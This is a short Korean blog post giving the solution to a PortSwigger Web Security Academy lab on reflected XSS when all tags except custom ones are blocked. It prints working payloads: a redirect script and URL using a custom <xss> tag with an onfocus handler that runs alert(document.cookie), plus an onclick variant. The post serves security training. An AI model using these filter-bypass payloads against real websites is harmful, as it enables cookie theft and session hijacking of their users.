본문 바로가기
정보보안/웹해킹

[PortSwigger] Reflected XSS into HTML context with all tags blocked except custom ones

by meanjung 2021. 10. 18.

custom tag 외에 모두 필터링 한다

 

<script>
location = 'https://your-lab-id.web-security-academy.net/?search=%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';
</script>

 

https://your-lab-id.web-security-academy.net/?search=<xss id=x onfocus=alert(document.cookie) tabindex=1>#x 

 

 

풀이가 이런 이유는 victim이 /exploit 링크를 클릭했을 때 익스되도록 만들기 위함인 듯 하다...


?search= 입력하는 곳에

<xss onclick=alert(document.cookie)>asdf</xss>

를 입력해도 된다. 

 

댓글